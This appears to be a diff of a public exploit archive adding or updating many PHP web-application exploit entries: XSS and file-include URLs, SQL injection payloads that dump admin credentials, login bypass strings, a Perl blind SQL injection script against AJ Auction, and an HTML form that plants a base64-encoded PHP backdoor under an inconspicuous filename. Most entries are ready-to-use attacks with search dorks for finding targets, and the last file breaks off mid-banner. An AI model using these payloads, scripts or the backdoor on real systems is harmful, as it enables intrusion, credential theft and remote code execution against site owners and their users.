echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
// invalid EUC-JP sequence
echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');

23
platforms/php/remote/33415.php Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/37389/info
PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.
Versions prior to PHP 5.2.12 are vulnerable.
<? php
$ _GET [ &#039; a1 &#039; ] = " \xf0 "; // \xf0 - \xfc ??? $ _GET [ &#039;A1&#039;] = "\ xf0"; / / \ xf0 - \ xfc possible
$ _GET [ &#039; a2 &#039; ] = " href=dummy onmouseover=alert(document.title) dummy=dummy "; $ _GET [ &#039;A2&#039;] = "href = dummy onmouseover = alert (document.title) dummy = dummy";
header ( " Content-Type:text/html; charset=Shift_JIS " ) ; header ( "Content-Type: text / html; charset = Shift_JIS");
?> ? "
< html > <Html>
< head >< title > Shift_JIS test </ title ></ head > <Head> <title> Shift_JIS test </ title> </ head>
< body > <Body>
< p >< a <P> <a title = " <?php echo htmlspecialchars ( $ _GET [ &#039; a1 &#039; ] , ENT_QUOTES, &#039; SJIS &#039; ) ?> " title = "<? php echo htmlspecialchars ($ _GET [ &#039;a1&#039;], ENT_QUOTES, &#039;SJIS&#039;)?>" href = " <?php echo htmlspecialchars ( $ _GET [ &#039; a2 &#039; ] , ENT_QUOTES, &#039; SJIS &#039; ) ?> " > test </ a ></ p > href = "<? php echo htmlspecialchars ($ _GET [ &#039;a2&#039;], ENT_QUOTES, &#039;SJIS&#039;)?>"> test </ a> </ p>
</ body > </ Body>
</ html > </ Html>

2
platforms/php/webapps/23697.txt
View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/9664/info
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.

12
platforms/php/webapps/33401.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37315/info
Million Pixel Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Million Pixel Script 3, 3 Pro, and 3 Pro Lotto are vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com/?pa=[XSS]

9
platforms/php/webapps/33404.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37329/info
phpFaber CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example is available:
http://www.example.com/module.php?mod=[XSS]

11
platforms/php/webapps/33406.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to Horde 3.3.6.
Note that additional products that use the Horde framework may also be vulnerable.
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;

11
platforms/php/webapps/33407.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to Horde 3.3.6.
Note that additional products that use the Horde framework may also be vulnerable.
http://www.example.com/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;

11
platforms/php/webapps/33408.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to Horde 3.3.6.
Note that additional products that use the Horde framework may also be vulnerable.
http://www.example.com/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;

10
platforms/php/webapps/33409.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37356/info
Article Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example is available:
Username : X' or ' 1=1
Password : X' or ' 1=1

13
platforms/php/webapps/33410.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/37371/info
The Sections module for Drupal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
To exploit this issue, the attacker must have 'administer sections' permissions.
Versions prior to Sections 5.x-1.3 and 6.x-1.3 are vulnerable.
The following example input is available:
<script>alert('xss');</script>

9
platforms/php/webapps/33411.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37380/info
iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
iSupport 1.8 and prior versions are vulnerable.
http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E

9
platforms/php/webapps/33412.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37380/info
iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
iSupport 1.8 and prior versions are vulnerable.
http://www.example.com/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E

9
platforms/php/webapps/33413.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37384/info
Pluxml-Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pluxml-Blog 4.2 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/core/admin/auth.php?p=1">

9
platforms/php/webapps/33416.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37393/info
QuiXplorer is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
QuiXplorer 2.4.1beta is vulnerable; other versions may also be affected.
http://www.example.com/path/?lang=../path/to/malicious_uploaded_code

12
platforms/php/webapps/33417.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37394/info
cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
cPanel versions prior to 11.25.0 are affected.
http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO

7
platforms/php/webapps/33418.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37403/info
The 'com_joomportfolio' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/

9
platforms/php/webapps/33419.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37408/info
F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
F3Site 2009 is vulnerable; other versions may also be affected.
http://www.example.com/mod/poll.php?GLOBALS[nlang]=[LFI%00]

9
platforms/php/webapps/33420.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37408/info
F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
F3Site 2009 is vulnerable; other versions may also be affected.
http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00]

168
platforms/php/webapps/3408.pl
View file

@ -1,84 +1,84 @@
#!/usr/bin/perl
#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.ajsquare.com
#[Dork : "/subcat.php?cate_id="
#[$$ : 250.00 USD
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/subcat.php?cate_id=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2007-03-04]
#!/usr/bin/perl
#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.ajsquare.com
#[Dork : "/subcat.php?cate_id="
#[$$ : 250.00 USD
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/subcat.php?cate_id=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2007-03-04]

98
platforms/php/webapps/5591.txt
View file

@ -1,49 +1,49 @@
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 12 MAY 2008
Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1
DORK: inurl:"classifide_ad.php"
Vendor Has Not Been Notified!
DESCRIPTION:
AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker,
to arbitrary inject mysql code/query.
the below injection will display the admin credentials.
SQL Injection's:
http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
NOTE/TIP:
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
peace, t0pP8uZz
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2008-05-12]
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 12 MAY 2008
Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1
DORK: inurl:"classifide_ad.php"
Vendor Has Not Been Notified!
DESCRIPTION:
AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker,
to arbitrary inject mysql code/query.
the below injection will display the admin credentials.
SQL Injection's:
http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
NOTE/TIP:
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
peace, t0pP8uZz
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2008-05-12]

80
platforms/php/webapps/5867.txt
View file

@ -1,40 +1,40 @@
#########################################################
#
# Auction Web 2.0 SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#=========================================================
# HomE script : http://www.ajauctionpro.com/ajhome.php
#
# Demo : http://www.ajauctionpro.com/auction_web2.0/
#
# DorK : Powered By AJ Auction Web
# DorK : Powered By Auction Web
#
##########################################################
Exploit:
http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--
Admin login
admin/index.php
################################################################################
#####################################( Greetz )#################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
# mos_chori / Rafi / FAHD / Iraq Hackers / #
# #
#################################(and All IRAQIs)###############################
################################################################################
# milw0rm.com [2008-06-19]
#########################################################
#
# Auction Web 2.0 SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#=========================================================
# HomE script : http://www.ajauctionpro.com/ajhome.php
#
# Demo : http://www.ajauctionpro.com/auction_web2.0/
#
# DorK : Powered By AJ Auction Web
# DorK : Powered By Auction Web
#
##########################################################
Exploit:
http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--
Admin login
admin/index.php
################################################################################
#####################################( Greetz )#################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
# mos_chori / Rafi / FAHD / Iraq Hackers / #
# #
#################################(and All IRAQIs)###############################
################################################################################
# milw0rm.com [2008-06-19]

28
platforms/php/webapps/6550.txt
View file

@ -1,14 +1,14 @@
############################################################################################
## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability
## POC :
## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password),
## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin--
## Live Demo :
## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4
## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19
## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42
## ,43,44,45,46,47,48,49,50,51+from+admin--
############################################################################################
# milw0rm.com [2008-09-24]
############################################################################################
## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability
## POC :
## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password),
## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin--
## Live Demo :
## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4
## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19
## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42
## ,43,44,45,46,47,48,49,50,51+from+admin--
############################################################################################
# milw0rm.com [2008-09-24]

68
platforms/php/webapps/6561.txt
View file

@ -1,34 +1,34 @@
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Xss /Remote SQL injection
Script : Aj auction platinum2 , last version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
=========================================================================
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin--
[Xss]
=========================================================================
EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script>
=========================================================================
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
thanx str0ke/*
# milw0rm.com [2008-09-25]
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Xss /Remote SQL injection
Script : Aj auction platinum2 , last version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
=========================================================================
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin--
[Xss]
=========================================================================
EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script>
=========================================================================
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
thanx str0ke/*
# milw0rm.com [2008-09-25]

56
platforms/php/webapps/6711.htm
View file

@ -1,28 +1,28 @@
<!--
9 Oct 2008
Kusaba <= 1.0.4 Remote Code Execution Exploit #2
Sausage <tehsausage@gmail.com>
Will work if they have left the load_receiver.php script un-edited.
After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print "Hello";
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
-->
<pre>
<form action="./load_receiver.php" method="POST">
<input type="text" name="password" value="changeme"> <!-- Don't actually
change this, unless they have changed their password and you know it -->
<input type="text" name="type" value="direct">
<input type="text" name="file"
value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">
<!-- same backdoor from the paint_save.php exploit -->
<input type="text" name="targetname" value="post.php"> <!-- Any
inconspicuous filename will do -->
<input type="submit" value="Exploit">
</form>
# milw0rm.com [2008-10-09]
<!--
9 Oct 2008
Kusaba <= 1.0.4 Remote Code Execution Exploit #2
Sausage <tehsausage@gmail.com>
Will work if they have left the load_receiver.php script un-edited.
After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print "Hello";
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
-->
<pre>
<form action="./load_receiver.php" method="POST">
<input type="text" name="password" value="changeme"> <!-- Don't actually
change this, unless they have changed their password and you know it -->
<input type="text" name="type" value="direct">
<input type="text" name="file"
value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">
<!-- same backdoor from the paint_save.php exploit -->
<input type="text" name="targetname" value="post.php"> <!-- Any
inconspicuous filename will do -->
<input type="submit" value="Exploit">
</form>
# milw0rm.com [2008-10-09]

116
platforms/php/webapps/7023.txt
View file

@ -1,58 +1,58 @@
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-06]
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://localhost/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://localhost/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-06]

6
platforms/php/webapps/7024.txt
View file

@ -1,4 +1,4 @@
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~] deltascripts phplinks Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
@ -25,7 +25,7 @@ note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
http://localhost/classifieds/admin/login.php
example for demo:
@ -40,7 +40,7 @@ example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
http://localhost/anunturi/admin/login.php

158
platforms/php/webapps/7087.txt
View file

@ -1,79 +1,79 @@
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
